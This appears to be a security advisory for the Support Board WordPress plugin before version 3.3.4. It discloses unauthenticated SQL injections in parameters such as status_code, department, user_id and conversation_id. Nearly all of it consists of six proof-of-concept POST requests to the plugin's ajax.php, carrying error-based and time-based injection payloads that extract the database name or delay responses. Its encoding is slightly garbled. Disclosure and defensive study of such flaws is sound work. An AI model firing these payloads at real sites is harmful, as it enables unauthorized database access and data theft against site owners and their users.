Support Board < 3.3.4 - Multiple Unauthenticated SQL Injections

The plugin does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.

PoC

The login-cookie parameter is needed, but does not require to be logged in. ----- PoC 1: Error Based SQLi (status_code) ----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: status_code (POST) function=new-conversation&status;_code=2"+AND+EXTRACTVALUE(4597,CONCAT(“”,“DB+Name:+”,(SELECT+(ELT(4597=4597,“”))),database()))+AND+“fKoo”=“fKoo&title;=&department;=&agent;_id=&routing;=false&login-cookie;=&user;_id=46&language;=false ----- PoC 2: Error Based SQLi (department)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: department (POST) function=new-conversation&status;_code=2o&title;=&department;=(UPDATEXML(5632,CONCAT(0x2e,“Database+Name:+”,(SELECT+(ELT(5632=5632,”“))),database()),3004))&agent;_id=&routing;=false&login-cookie;=&user;_id=46&language;=false ----- PoC 3: Error Based SQLi (user_id) ----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: user_id (POST) function=send-message&user;_id=-5”+AND+GTID_SUBSET(CONCAT(“Database+Name:+”,(SELECT+(ELT(3919=3919,“”))),database()),3919)+AND+“wrOJ”=“wrOJ&conversation;_id=35&message;=TEST+POC&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false ----- PoC 4: Time Based SQLi (conversation_id)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_id (POST) function=send-message&user;_id=5&conversation;_id=45”+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)–+BOXv&message;=test+&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false ----- PoC 5: Time Based SQLi (conversation_status_code)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_status_code (POST) function=send-message&user;_id=5&conversation;_id=45&message;=test+&conversation;_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)–+uAGp&queue;=false&payload;=false&recipient;_id=false&login-cookie;=&language;=false ----- PoC 6: Time Based SQLi (recipient_id)----- Request POST /wp-content/plugins/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: recipient_id (POST) function=send-message&user;_id=5&conversation;_id=45&message;=test+&conversation;_status_code=false&queue;=false&payload;=false&recipient;_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie;=&language;=false